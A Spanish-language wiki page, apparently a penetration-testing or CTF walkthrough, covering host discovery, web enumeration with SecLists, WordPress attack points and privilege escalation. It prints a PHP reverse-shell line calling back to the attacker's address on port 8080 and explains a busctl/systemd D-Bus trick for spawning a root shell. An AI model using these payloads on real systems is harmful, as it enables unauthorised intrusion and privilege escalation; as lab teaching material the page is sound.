¡Esta es una revisión vieja del documento!
Normalmente siempre es conveniente saber cual es la ip
Ver si responde a pings y observar el trazado
ping -c1 192.168.0.213 -R PING 192.168.0.213 (192.168.0.213) 56(124) bytes of data. 64 bytes from 192.168.0.213: icmp_seq=1 ttl=64 time=1.75 ms RR: 192.168.0.93 (atacante) 192.168.0.213 (víctima) 192.168.0.213 (víctima) 192.168.0.93 (atacante) --- 192.168.0.213 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 1.746/1.746/1.746/0.000 ms
parámetros básicos y más utilizados
Ver si revela alguna información
Es específico para servidores web y útil si no sabemos interpretar bien los encabezados http del comando anterior
Fuerza bruta y pistas
Estructura, carpetas de seclists y archivos de interés | |
---|---|
Discovery | Directorios y archivos en servidores web |
Pattern-Matching | Patrones para extraer información sensible |
Routers | Usuarios, contraseñas por defecto en routers |
Fuzzing | Pruebas para identificar vulnerabilidades |
Miscellaneous | SQL injection, cross-site scripting (XSS) |
Passwords,Usernames | Ataques de fuerza bruta |
User-Agents | Cadenas para simular navegadores web y dispositivos |
Discovery/Web-Content/Logins.fuzz.txt | Paneles de login web .php,.asp,.rb,.py,logon.py etc |
Descargar, conocer seclists, un conjunto de diccionarios de fuerza bruta para poder hacer fuzzing
Identificar aplicaciones web instaladas, CMS
wp-admin | Redirecciona a wp-login.php, Panel de login |
wp-login.php | Panel de login |
xmlrpc.php | Usado para hacer fuerza bruta con wpscan, más rápido que al panel de login con hydra |
wp-config.php | Contiene nombres de usuario y contraseñas de bases de datos |
Buscar vulnerabilidades para las versiones detectadas de los servicios descubiertos
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.93/8080 0>&1'"); ?>
#!/bin/bash bash
sudo | Ejecuta con privilegios de root (necesario para cambiar propiedades de systemd) |
busctl | Herramienta para interactuar con D-Bus |
set-property | Subcomando de busctl para cambiar una propiedad expuesta vía D-Bus |
org.freedesktop.systemd1 | Servicio D-Bus de systemd |
/org/freedesktop/systemd1 | Objeto D-Bus raíz que representa al gestor de systemd |
org.freedesktop.systemd1.Manager | Interfaz D-Bus que gestiona systemd, Contiene propiedades y métodos para controlar systemd (iniciar/parar servicios, cambiar configuraciones, etc). |
LogLevel | Propiedad que se va a modificar |
s | Tipo de dato: s = string (en la notación de tipos de D-Bus) |
debug | Nuevo valor: debug (valor de la propiedad LogLevel) |
argv1=-c | Primer argumento pasado a /bin/sh, -c significa “ejecuta el siguiente comando como script |
argv2='/bin/sh -i | Ejecuta la shell en modo interactivo |
0<&2 | Redirige stderr a entrada estandar |
1>&2 | Redirige Salida estandar a stdrr |
…..continuará. Feliz hacking